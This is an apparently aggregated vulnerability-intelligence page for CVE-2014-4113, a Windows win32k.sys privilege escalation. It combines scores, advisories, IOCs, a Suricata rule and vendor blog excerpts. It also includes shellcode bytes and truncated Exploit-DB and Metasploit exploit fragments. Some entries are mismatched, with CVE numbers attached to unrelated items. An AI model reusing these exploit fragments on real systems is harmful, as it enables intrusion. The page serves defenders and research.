CVE-2014-4113
published 2014-10-15CVE-2014-4113: win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8…
PriorityP184high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-05-25
Exploited in the wild
EPSS
87.04%
99.7th percentile
win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability."
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
| microsoft | windows_server_2012 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60
- →Detect NTFS Alternate Data Stream (ADS) creation at C:\Windows\Temp:1, used to hide the Native Application binary from standard file browsers. ↗
- →Monitor for modifications to HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SetupExecute and BootExecute registry values, which the malware alters to persist a Native Application across reboots. ↗
- →Alert on creation of rdpinst.exe and its registration under \Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce as a persistence indicator for the final payload. ↗
- →Detect use of low-level syscall stubs INT 2Eh and CALL ntdll!KiFastSystemCall in user-mode processes, used to bypass AV/sandbox user-space hooks. ↗
- →Detect removal of filter driver registry entries prior to reboot, a technique used to disable AV drivers before the Native Application executes during boot. ↗
- →Detect TrackPopupMenu-based win32k.sys exploitation pattern: a WH_CALLWNDPROC hook combined with TrackPopupMenu calls, as used in the CVE-2014-4113 PoC exploit targeting Windows 8.0–8.1 x64. ↗
- →Flag processes spawning cmd.exe /c reg.exe for registry modification, as the malware uses this indirection to distance itself from direct malicious registry writes. ↗
- ·The malware contains extensive anti-sandbox and anti-AV checks; it will prematurely terminate and re-encrypt its .data section if it detects a sandbox, VM, or specific AV products, meaning sandbox-only analysis will miss full functionality. ↗
- ·The malware checks for two hard-coded MAC addresses and terminates if the host matches either, limiting detonation on certain analysis machines. ↗
- ·The exploit for CVE-2014-4113 is embedded as a 64-bit executable inside a nested encrypted/compressed blob (Matryoshka structure); static extraction requires RC4 decryption with key 'dqrChZonUF' followed by aPLib decompression. ↗
- ·Swapping the shellcode in the EDB-37064 PoC for a bind or reverse shell will cause a BSOD; the embedded shellcode only safely executes cmd.exe. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Microsoft Win32k Privilege Escalation Vulnerability
cisa·2022-05-04·CVSS 7.8
CVE-2014-4113 [HIGH] CWE-264 Microsoft Win32k Privilege Escalation Vulnerability
Vulnerability: Microsoft Win32k Privilege Escalation Vulnerability
Affected: Microsoft Win32k
Microsoft Win32k contains an unspecified vulnerability that allows for privilege escalation.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2014-4113
Remediation Due Date: 2022-05-25
GHSA
GHSA-wjjh-xg7v-8wf9: win32k
ghsa_unreviewed·2022-05-14
CVE-2014-4113 [HIGH] GHSA-wjjh-xg7v-8wf9: win32k
win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability."
VulnCheck
Microsoft Win32k Privilege Escalation Vulnerability
vulncheck·2014·CVSS 7.8
CVE-2014-4113 [HIGH] CWE-264 Microsoft Win32k Privilege Escalation Vulnerability
Microsoft Win32k Privilege Escalation Vulnerability
Microsoft Win32k contains an unspecified vulnerability that allows for privilege escalation.
Affected: Microsoft Win32k
Required Action: Apply updates per vendor instructions.
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/; https://www.cve.org/CVERecord?id=CVE-2014-4113; https://www.group-ib.com/resources/threat-research/Anunak_APT_against_financial_institutions.pdf; https://cyberwarzone.com/wp-content/uploads/2019/02/ReportGlobalThreatIntelligence.pdf; https://www.crowdstrike.com/blog/cyber-deterrence-in-action-a-story-of-one-long-hur
Suricata
ET WEB_CLIENT Possible CVE-2014-4113 Exploit Download with Hurricane Panda IOC
suricata·2014-10-15·CVSS 7.8
CVE-2014-4113 [HIGH] ET WEB_CLIENT Possible CVE-2014-4113 Exploit Download with Hurricane Panda IOC
ET WEB_CLIENT Possible CVE-2014-4113 Exploit Download with Hurricane Panda IOC
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Possible CVE-2014-4113 Exploit Download with Hurricane Panda IOC"; flow:established,to_client; flowbits:isset,ET.http.binary; file.data; content:"woqunimalegebi"; fast_pattern; reference:url,blog.crowdstrike.com/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/; reference:cve,2014-4113; classtype:attempted-user; sid:2019421; rev:4; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2014_10_15, cve CVE_2014_4113, deployment Perimeter, confidence Medium, signature_severity Major, tag Web_Client_Attacks, tag CISA_KEV, update
Exploit-DB
Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit)
exploitdb·2018-10-08
CVE-2016-3225 Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit)
Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/post/windows/reflective_dll_injection'
class MetasploitModule 'Windows Net-NTLMv2 Reflection DCOM/RPC',
'Description' => %q(
Module utilizes the Net-NTLMv2 reflection between DCOM/RPC
to achieve a SYSTEM handle for elevation of privilege. Currently the module
does not spawn as SYSTEM, however once achieving a shell, one can easily
use incognito to impersonate the token.
),
'License' => MSF_LICENSE,
'Author' =>
[
'FoxGloveSec', # the original Potato exploit
'breenmachine', # Rotten Potato NG!
'Mumbai' # Austin : port of RottenPotato for reflection & quick module
],
'
Exploit-DB
Microsoft Windows Kernel - 'win32k.sys' Local Privilege Escalation (MS14-058)
exploitdb·2016-04-05·CVSS 7.8
CVE-2014-4113 [HIGH] Microsoft Windows Kernel - 'win32k.sys' Local Privilege Escalation (MS14-058)
Microsoft Windows Kernel - 'win32k.sys' Local Privilege Escalation (MS14-058)
---
Sources:
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf
https://github.com/sam-b/CVE-2014-4113
EDB Mirror: https://www.exploit-db.com/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113.pdf
Trigger and exploit code for CVE-2014-4113:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39666.zip
Exploit-DB
Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Local Privilege Escalation (MS14-058)
exploitdb·2015-05-19·CVSS 7.8
CVE-2014-4113 [HIGH] Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Local Privilege Escalation (MS14-058)
Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Local Privilege Escalation (MS14-058)
---
# Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058)
# CVE-2014-4113 Privilege Escalation
# http://www.offensive-security.com
# Thx to Moritz Jodeit for the beautiful writeup
# http://www.exploit-db.com/docs/35152.pdf
# Target OS Windows 8.0 - 8.1 x64
# Author: Matteo Memelli ryujin offensive-security.com
# EDB Note: Swapping the shellcode for a bind or reverse shell will BSOD the machine.
from ctypes import *
from ctypes.wintypes import *
import struct, sys, os, time, threading, signal
ULONG_PTR = PVOID = LPVOID
HCURSOR = HICON
PDWORD = POINTER(DWORD)
PQWORD = POINTER(LPVOID)
LRESULT = LPVOID
UCHAR = c_ubyte
QWORD = c_ulonglong
CHAR = c_char
NTSTATUS = DWORD
MIIM_STRING = 0x
Exploit-DB
Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)
exploitdb·2014-11-24
CVE-2014-4113 Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)
Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)
---
#include "hd.h"
// EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46945.rar
byte __s_code[]={
0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 ,
0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 ,
0x4C ,0x89 ,0x70 ,0x10 ,0x90 ,0x65 ,0x48 ,0x8B ,0x04 ,0x25 ,0x30 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8B ,
0x40 ,0x60 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x8B ,0x78 ,0x18 ,0x48 ,0x8B ,0x47 ,0x10 ,0x48 ,0x83 ,
0xC7 ,0x10 ,0x48 ,0x3B ,0xC7 ,0x0F ,0x84 ,0x99 ,0x01 ,0x00 ,0x00 ,0x48 ,0xBB ,0x65 ,0x00 ,0x6C ,
0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x48 ,0xBE ,0x2E ,0x00 ,0x64 ,0x00 ,0x6
Exploit-DB
Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)
exploitdb·2014-10-28
CVE-2014-4113 Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)
Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',
'Description' => %q{
This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability
can be triggered through the use of TrackPopupMenu. Under special conditions, the
NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
code execution. This module has been tested successfully on Windows XP SP3, Windows
2003 SP2, Windows 7 SP1 and Windows 2008 32bi
Metasploit
Windows TrackPopupMenu Win32k NULL Pointer Dereference
metasploit
Windows TrackPopupMenu Win32k NULL Pointer Dereference
Windows TrackPopupMenu Win32k NULL Pointer Dereference
This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.
Dfir Report
Inside the Open Directory of the “You Dun” Threat Group
blogs_dfir_report·2024-10-28
Inside the Open Directory of the “You Dun” Threat Group
From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion Read More
- dragonforce Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware Gangs Read More
Services Overview
Threat Hunting
-
Integration
CTI Program Advisory
Incident Response Playbook
About us
Contact Us
Collaboration
Careers
Analysts
Access DFIR Labs
Get in Touch
Public Reports
Products Overview
Threat intel Overview
Threat Feed
Private DFIR Reports
All Intel
Active Defense
DFIR Labs
Case Artifacts
Detection Pack
AI Training Ground
Service Overview
Threat Hunting
Integration
CTI Program Advisory
Incident Response Playbook
Company Overview
About us
Contact Us
Careers
Analyst
SQL Brute Force Leads to BlueSky Ransomware
From OneNote to RansomNote: An Ice Col
Bleepingcomputer
Privilege elevation exploits used in over 50% of insider attacks
blogs_bleepingcomputer·2023-12-08
Privilege elevation exploits used in over 50% of insider attacks
## Privilege elevation exploits used in over 50% of insider attacks
## Bill Toulas
Elevation of privilege flaws are the most common vulnerability leveraged by corporate insiders when conducting unauthorized activities on networks, whether for malicious purposes or by downloading risky tools in a dangerous manner.
A report by Crowdstrike based on data gathered between January 2021 and April 2023 shows that insider threats are on the rise and that using privilege escalation flaws is a significant component of unauthorized activity.
According to the report, 55% of insider threats logged by the company rely on privilege escalation exploits, while the remaining 45% unwittingly introduce risks by downloading or misusing offensive tools.
Rogue insiders typically turn against their employer b
Checkpoint
Exploit Developer Spotlight: The Story of PlayBit
blogs_checkpoint·2020-10-26·CVSS 7.8
CVE-2018-8453 [HIGH] Exploit Developer Spotlight: The Story of PlayBit
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Exploit Developer Spotlight: The Story of PlayBit
Research By: Eyal Itkin and Itay Cohen
## Introduction
Exploits have always been an important and integral part of malicious attacks.
Sentinelone
Malware Discovered - SFG: Furtim Malware Analysis
blogs_sentinelone·2016-07-12
Malware Discovered - SFG: Furtim Malware Analysis
###### By Joseph Landry and Udi Shamir
Update, 14-July: There have been a number of stories published since the posting of this blog that have suggested this attack is specifically targeting SCADA energy management systems. We want to emphasize that we do not have any evidence that this is in fact the case. The focus of our analysis was on the characteristics of the malware, not the attribution or target.
The Labs team at SentinelOne recently discovered a sophisticated malware campaign specifically targeting at least one energy company. Upon discovery, the team reverse engineered the code and believes that based on the nature, behavior and sophistication of the malware and the extreme measures it takes to evade detection, it likely points to a nation-state sponsored initiative, potential
Sentinelone
Malware Discovered - SFG: Furtim Malware Analysis
blogs_sentinelone·2016-07-12
Malware Discovered - SFG: Furtim Malware Analysis
## By Joseph Landry and Udi Shamir
Update, 14-July : There have been a number of stories published since the posting of this blog that have suggested this attack is specifically targeting SCADA energy management systems. We want to emphasize that we do not have any evidence that this is in fact the case. The focus of our analysis was on the characteristics of the malware, not the attribution or target.
The Labs team at SentinelOne recently discovered a sophisticated malware campaign specifically targeting at least one energy company. Upon discovery, the team reverse engineered the code and believes that based on the nature, behavior and sophistication of the malware and the extreme measures it takes to evade detection, it likely points to a nation-state sponsored initiative, potentially
Unit42
Super Tuesday: A Patch Tuesday We Won’t Forget
blogs_unit42·2014-10-15·CVSS 7.8
[HIGH] Super Tuesday: A Patch Tuesday We Won’t Forget
Sometimes “Patch Tuesday” comes and goes with little excitement or fanfare; yesterday was not one of those days. In just one day, Oracle released patches for 154 new vulnerabilities, Adobe issued updates for Flash and ColdFusion, and Microsoft released 24 patches of their own. On top of the sheer volume of patches, we learned that three of the Microsoft vulnerabilities were being exploited in targeted attack campaigns.
### Sandworm
The first to drop was the Sandworm Campaign, a report from iSight partners, which described attacks on European and American targets in the month of August using new versions of the BlackEnergy bot, but the group behind the attacks has been operating since at least 2009. The biggest news here was the group’s exploitation of a “new” vulnerability in Windows, CV
Unit42
Super Tuesday: A Patch Tuesday We Won’t Forget
blogs_unit42·2014-10-15·CVSS 7.8
[HIGH] Super Tuesday: A Patch Tuesday We Won’t Forget
## Super Tuesday: A Patch Tuesday We Won’t Forget
Ryan Olson
Published: October 15, 2014
Threat Research
Vulnerabilities
BlackEnergy
ISight
Microsoft
Microsoft Security Bulletin
Patch Tuesday
PowerShell Empire
Sandworm
Sometimes “Patch Tuesday” comes and goes with little excitement or fanfare; yesterday was not one of those days. In just one day, Oracle released patches for 154 new vulnerabilities , Adobe issued updates for Flash and ColdFusion , and Microsoft released 24 patches of their own. On top of the sheer volume of patches, we learned that three of the Microsoft vulnerabilities were being exploited in targeted attack campaigns.
## Sandworm
The first to drop was the Sandworm Campaign , a report from iSight partners, which described attacks on European and American t
Talos
Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
blogs_talos·2014-10-14·CVSS 7.8
[HIGH] Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
## Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
This post was authored by Yves Younan
Microsoft Tuesday is here once again and this month they are releasing a total of eight bulletins. Three of which are rated as critical, while the remaining five are rated as important. There’s a total of 24 CVEs this month, 20 of which were privately disclosed to Microsoft and four which are either publicly known or under active attack, making them 0-day vulnerabilities. Of those four, two are being actively attacked, while two have been publicly disclosed but do not seem to be under attack for supported software. Of the 24 CVEs, 15 are categorized as allowing remote code execution, four as elevation of privilege and three as security feature bypasses.
The first bulletin is
Talos
Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
blogs_talos·2014-10-14·CVSS 4.3
[MEDIUM] Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
This post was authored by Yves Younan
Microsoft Tuesday is here once again and this month they are releasing a total of eight bulletins. Three of which are rated as critical, while the remaining five are rated as important. There’s a total of 24 CVEs this month, 20 of which were privately disclosed to Microsoft and four which are either publicly known or under active attack, making them 0-day vulnerabilities. Of those four, two are being actively attacked, while two have been publicly disclosed but do not seem to be under attack for supported software. Of the 24 CVEs, 15 are categorized as allowing remote code execution, four as elevation of privilege and three as security feature bypasses.
The first bulletin is MS14-056 and is the IE bulletin. There’s a total of 14 CVEs and it is rated
Crowdstrike
CrowdStrike Discovers Use of 64-bit Exploit by Hurricane Panda
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] CrowdStrike Discovers Use of 64-bit Exploit by Hurricane Panda
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Crowdstrike
How Insiders Use Vulnerabilities Against Organizations
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] How Insiders Use Vulnerabilities Against Organizations
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Almuthanna Alageel
and
Sergio Maffeis
Department of Computing
Imperial College London
London, United Kingdom
plain
plain
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/http://blogs.technet.com/b/srd/archive/2014/10/14/accessing-risk-for-the-october-2014-security-updates.aspxhttp://osvdb.org/show/osvdb/113167http://packetstormsecurity.com/files/131964/Windows-8.0-8.1-x64-TrackPopupMenu-Privilege-Escalation.htmlhttp://secunia.com/advisories/60970http://www.exploit-db.com/exploits/35101http://www.securityfocus.com/bid/70364https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-058https://github.com/sam-b/CVE-2014-4113https://www.exploit-db.com/exploits/37064/https://www.exploit-db.com/exploits/39666/http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/http://blogs.technet.com/b/srd/archive/2014/10/14/accessing-risk-for-the-october-2014-security-updates.aspxhttp://osvdb.org/show/osvdb/113167http://packetstormsecurity.com/files/131964/Windows-8.0-8.1-x64-TrackPopupMenu-Privilege-Escalation.htmlhttp://secunia.com/advisories/60970http://www.exploit-db.com/exploits/35101http://www.securityfocus.com/bid/70364https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-058https://github.com/sam-b/CVE-2014-4113https://www.exploit-db.com/exploits/37064/https://www.exploit-db.com/exploits/39666/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2014-4113
2014-10-15
Published
2022-05-04
Added to CISA KEV
Exploited in the wild